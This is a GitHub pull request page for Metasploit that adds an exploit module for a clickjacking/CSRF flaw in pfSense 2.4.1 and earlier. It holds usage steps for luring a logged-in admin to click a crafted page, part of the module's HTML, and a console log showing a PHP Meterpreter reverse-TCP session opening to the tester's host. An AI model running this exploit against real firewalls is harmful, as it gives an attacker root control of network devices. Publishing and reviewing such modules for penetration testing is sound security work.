Skip to content

/ metasploit-framework

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add exploit module for Clickjacking vulnerability in CSRF error page pfSense <= 2.4.1 #9234

Merged
merged 6 commits into from Dec 12, 2017
Merged

Add exploit module for Clickjacking vulnerability in CSRF error page pfSense <= 2.4.1 #9234

merged 6 commits into from Dec 12, 2017
+171 −0

Conversation

@ykoster
Copy link
Contributor

@ykoster ykoster commented Nov 22, 2017
edited by wchen-r7

This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.

pfSense is a free and open source firewall and router. It was found that the pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin into interacting with a specially crafted webpage it is possible for an attacker to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user, this will result in a full compromise of the pfSense instance.

Verification

The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possibly the WebGUI's TLS certificate must be trusted in the browser.

  • use exploit/unix/http/pfsense_clickjacking
  • set TARGETURI https://<ip WebGUI>
  • exploit
  • Browse to the URL returned by MSF
  • Click anywhere on the returned page
  • Note that a new Meterpreter sessions was started.
ykoster added 5 commits Nov 22, 2017
@ykoster
Add exploit module for Clickjacking vulnerability in CSRF error page …
Loading status checks…
916ee05 
…pfSense
@ykoster
Update pfsense_clickjacking.md
Verified
This commit was created on GitHub.com and signed with a verified signature using GitHub’s key.
GPG key ID: 4AEE18F83AFDEB23 Learn about signing commits
Loading status checks…
5b5c552
@ykoster
Update pfsense_clickjacking.md
Verified
This commit was created on GitHub.com and signed with a verified signature using GitHub’s key.
GPG key ID: 4AEE18F83AFDEB23 Learn about signing commits
Loading status checks…
b5994bd
@ykoster
Fixed date
Verified
This commit was created on GitHub.com and signed with a verified signature using GitHub’s key.
GPG key ID: 4AEE18F83AFDEB23 Learn about signing commits
Loading status checks…
d21d3c1
@ykoster
Fixed URL...
Verified
This commit was created on GitHub.com and signed with a verified signature using GitHub’s key.
GPG key ID: 4AEE18F83AFDEB23 Learn about signing commits
Loading status checks…
a02a02c
@jvoisin
jvoisin reviewed Nov 27, 2017
View changes
modules/exploits/unix/http/pfsense_clickjacking.rb Outdated
resp.body = %Q|<!DOCTYPE html>
<html>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />

This comment has been minimized.

Sign in to view
@jvoisin

jvoisin Nov 27, 2017
Contributor

I don't think that we want to depend on external javascript :/
@ykoster
Added local copies of the static content
Loading status checks…
942e44c
@ykoster
Copy link
Contributor Author

@ykoster ykoster commented Dec 2, 2017

Included static content as suggested by @jvoisin
@wchen-r7 wchen-r7 self-assigned this Dec 12, 2017
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Dec 12, 2017

Works as advertised:

msf exploit(pfsense_clickjacking) > show options

Module options (exploit/unix/http/pfsense_clickjacking):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   SRVHOST    0.0.0.0               yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  http://172.16.85.132  yes       The base path to the web application
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.85.1      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   pfSense <= 2.4.1


msf exploit(pfsense_clickjacking) > set srvhost 172.16.85.1
srvhost => 172.16.85.1
msf exploit(pfsense_clickjacking) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.85.1:4444 
[*] Using URL: http://172.16.85.1:8080/vB3oWRYgtwaFtR
[*] Server started.
msf exploit(pfsense_clickjacking) > [*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.css Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.js Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/background.jpg Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] Sending stage (37543 bytes) to 172.16.85.132
[*] Meterpreter session 1 opened (172.16.85.1:4444 -> 172.16.85.132:43529) at 2017-12-12 14:25:36 -0600
@wchen-r7 wchen-r7 merged commit 942e44c into rapid7:master Dec 12, 2017
2 checks passed
2 checks passed
Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
wchen-r7 added a commit that referenced this pull request Dec 12, 2017
@wchen-r7
Land #9234, Add exploit for ClickJacking vuln for pfSense
Unverified
This user has not uploaded their public key yet.
GPG key ID: 6E162ED2C01D9AAC Learn about signing commits
Loading status checks…
37514ee 
Land #9234
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Dec 12, 2017

Release Notes

This exploits a CSRF in pfSense that allows the attack to perform a click-jacking attack.
@stevenseeley
Copy link
Contributor

@stevenseeley stevenseeley commented Dec 12, 2017
edited

I know this is already merged, but I am just curious, where in the module is the csrf click jacking page used (csrf-magic.php) as per the blog post? This looks like a csrf attack to diag_command.php, in which case, no clicky is required.
@h00die
Copy link
Contributor

@h00die h00die commented Dec 12, 2017

Line 82 shows diag_command.php as the target
@stevenseeley
Copy link
Contributor

@stevenseeley stevenseeley commented Dec 13, 2017
edited

huh, where? also, my point still stands. This is csrf isn't it?
@h00die
Copy link
Contributor

@h00die h00die commented Dec 13, 2017

https://github.com/rapid7/metasploit-framework/pull/9234/files#diff-5b9c9bad22d0dde20b2a408968e1490cR82
@stevenseeley
Copy link
Contributor

@stevenseeley stevenseeley commented Dec 13, 2017

Yep, I see how its working now. My bad.
@ykoster
Copy link
Contributor Author

@ykoster ykoster commented Dec 13, 2017

I suppose targeting the file editor would also work, less trivial though
@tdoan-r7 tdoan-r7 added the rn-exploit label Dec 20, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin

Assignees

@wchen-r7 wchen-r7

Labels
docs module
Projects
None yet
Milestone
No milestone
Linked issues

Successfully merging this pull request may close these issues.

None yet

8 participants
@ykoster @wchen-r7 @stevenseeley @h00die @jvoisin @tdoan-r7 @acammack-r7 @bwatters-r7